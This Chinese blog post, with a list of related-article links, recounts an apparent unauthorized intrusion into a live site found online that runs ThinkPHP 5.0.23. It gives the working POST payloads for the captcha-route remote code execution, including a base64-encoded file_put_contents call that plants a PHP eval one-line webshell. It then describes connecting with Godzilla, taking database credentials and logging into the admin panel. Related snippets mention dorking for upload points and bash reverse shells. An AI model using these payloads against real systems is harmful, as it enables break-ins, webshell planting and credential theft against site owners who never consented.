记一次渗透实战

最新推荐文章于 2024-06-18 13:30:38 发布
最新推荐文章于 2024-06-18 13:30:38 发布
阅读量960 收藏 10
点赞数
分类专栏: 安全基础 文章标签: 乌鸦安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/122699451
版权

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

更新时间:2021.05.14

01   前提

在早些时候看到先知上有一篇关于thinkphp  rce的实战文章

https://xz.aliyun.com/t/6267

于是顺着师傅的思路也来试试

从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了

02 geshell之路

通过报错的方式发现了当前的版本为

ThinkPHPV5.0.23

通过师傅的思路,先去找phpinfo界面

http://127.0.0.1/index.php?s=captcha

POST数据:

_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()

成功拿到phpinfo界面

查看下这里禁用了贼多的命令

那尝试写一下一句话木马吧,按照师傅写的参考里面使用了很多次都没有效果,此时一度陷入僵局。

后来经过不断的fuzz发现,这里获取phpinfo界面的方式还有post的,后端可以同时接收getpost的数据。

知道这个之后,按照师傅文章的提示进行如下的数据构造:

_method=__construct&filter[]=assert&method=post&server[REQUEST_METHOD]=file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

将一句话木马进行加密

命令执行成功,get到shell

03 进后台

在路径:

/www/wwwroot/xxxxx/application/

发现数据库配置文件

蚁剑连接数据库失败:

使用哥斯拉连接数据库成功

查询到后台的账号和密码,在后台中翻到了后台地址(啊,这还不如直接猜。。。。)

登陆后台成功

04 总结

这次主要是踩在师傅宽大的肩膀上成功getshell的,但是还没能进行提权,命令直接被禁用,等下次有时间的时候再搞吧,溜了溜了

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

乌鸦安全
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次想尽各种方法的渗透测试实战
03-10 1598
前言 本文总结一下漫长的渗透测试过程,想尽了各种方法,终于找到了突破口。 so没有绝对的安全,所谓的安全性其实都是相对的~ 信息踩点 在这里其实没办法去做一些有价值的收集,只能踩点,踩坑。 信息难点 传输加密: 要做渗透的目标是一个APP,根据抓到的请求包发现这个APP是经过某产品加固过的,所以HTTP的POST请求正文部分(Data)是神奇的密文~ 分析难点 分析: 信息踩点其实也是解决难点的过程,在这里我们尝试对APP进行逆向,发现并没有什么东西,因为被加固了。...
网络安全一次简单渗透测试实战
kali_Ma的博客
09-23 3185
整个渗透过程(尤其是提权过程)都异常的顺利,虽然通过辅助平台查询后发现有多个漏洞可以利用,但没想到msf的getsystem直接就拿下了最高权限。
渗透测试 | 微信小程序反编译审计漏洞(学习笔)
2401_84466227的博客
06-18 1345
微信小程序反编译渗透测试是一种针对微信小程序的安全测试方法。它的主要目的是通过反编译微信小程序的源代码,发现潜在的安全漏洞并进行渗透测试。想要反编译工具或进一步了解渗透测试的小伙伴可以扫描下方二维码。
一次渗透测试实战
热门推荐
m0_46467017的博客
04-23 2万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
一次渗透测试实战
zhangge3663的博客
11-02 1390
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
一次渗透测试
Hungchuiho的博客
05-30 2042
一、前言:因为最近学习的有点膨胀感觉自己应该可以对一些简单的网站拿下服务器。这也是为什么有我这篇文章的出现的原因。 二、网站测试过程: 1、网站的选择: 对于测试的网站的我是使用googlehack语法来搜索的,对于如何使用Googlehack语法我就不说了,网上有使用教程,运气很好不用多久我找到了一个可以对其进行测试的网站。 2、网站进行信息收集: Whois信息–注册人、电话、邮箱、DNS、...
一次渗透实战【转】
时光凉春衫薄的博客
07-10 5599
一次渗透实战【转】 信息收集 用dirsearch扫了一波目录没有发现什么东西 直接用主站域名解析的ip访问发现主站是挂有cdn的 subDomainsBrute 扫描子域名 其中一个子域没挂CDN,由此找到网站的真实ip 得到真实ip后nmap扫描发现8099端口有个未知应用 访问发现是个WEB服务,一个登陆界面漏洞利用 趁nmap还在工作的时候,简单浏览了下网站的功能,伪静态,整个网站也没...
一次国外某内网的实战过程.pdf
11-25
WEB安全、内网渗透
溯源系列:溯源案例二(2022实战 - 一次Everything服务引发的蓝队溯源以及Everything后渗透的利用简介)
01-08
本文将深入探讨一个实际案例,即2022年一起由Everything服务引起的蓝队溯源实践,以及对Everything的后渗透利用进行简要介绍。 Everything是一款高效快速的文件搜索工具,由 VoidTools 开发。它的主要功能是实时...
内网渗透一次录 作者:Jaky.pdf
04-08
### 内网渗透实战分析与技术要点 #### 一、前言 内网渗透测试是一项高级的安全测试技术,主要用于评估企业内部网络的安全性。通过对已获得初步访问权限的目标系统进行深度探索,渗透测试人员能够发现潜在的安全...
网络安全渗透测试、安全服务面试题
最新发布
07-01
- **复盘准备**:在面试前,建议对参与过的项目进行一次全面的复盘,包括但不限于项目的背景、目标、实施过程以及最终成果等。通过文字形式录下来,可以帮助自己更好地回忆起项目的细节,从而在面试时更加流畅地...
web渗透实例
12-08
本文是一次针对特定网站进行渗透测试的真实案例录。渗透测试的目标是评估Web应用的安全性,并识别潜在的安全漏洞。作者kyo327在文章中详细描述了整个渗透过程中的策略和技术手段。 #### 二、初期探索阶段 在渗透...
微信公众号开发之内网渗透
youhebuke225的博客
05-30 1376
本地服务器 我们先使用express框架写一个简单的服务器 初始化项目 npm init 下载express框架 npm install express -S 写一个简单的服务器 const express = require("express"); const app = express(); app.use((req, res, next) => { console.log(req.query); res.send("Hello World!"); }); app.li
微信公众号开发本地调试【内网穿透】
内网渗透的博客
08-08 226
在做微信公众号开发的时候,必须接入外网已经备案的URL地址,不然本地没法进行调试,比较简单的方法可以做内网穿透,映射生成一个外网URL地址来进行回调测试。这里推荐一个内网穿透工具——cpolar,可以免费使用,支持http/https/tcp协议,不限制流量。
网络安全之信息收集
jazzz98的博客
05-26 1339
​ 在信息收集这块区域,我将其分为两部分:第一部分即被动信息收集,第二部分即主动信息收集。
微信公众号开发内网渗透常用工具+超详细操作步骤
weixin_33982670的博客
01-20 751
前段时间接触到微信公众号开发,需要做外网映射,就是需要把本地服务 映射到外网,微信web开发工具才能访问到部署到tomcat的应用。 so, 本狗蛋到网上一搜,发现 外网映射的工具还是挺多的,有了这些工具,恰好平时自己又开发有一些作品,但又没有部署到外网,这时候就可以启动本地tomcat 服务,然后用工具映射到外网,在朋友面前装逼一把。如果,电脑硬盘有各位老师羞答答视频,就可以做一小视频网站,...
【攻防技术】信息收集之公众号自动收集
刘家华(游戏开发)
05-27 553
公众号自动收集的小脚本
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 538
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
安全测试--WEB,微信端渗透测试报告
Qton_CSDN的博客
02-27 4019
测试流程: 1.先用wvs扫 2.暴力破解 3.稍微看下请求包有什么不妥的地方没有,比如明文传输,cookie放太多个人信息,等等 4.一边看wvs结果可以一边找sql注入点,比如查询的地方 5.一边看wvs一边看xss的注入点,比如存储数据的地方 6.找文件上传的地方,尝试绕过,传马 7.有短信/邮箱服务的试一下炸弹 8.扫一下开启的端口,看看有没有开启不安全的服务等等 。。。差不多这样吧 都...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值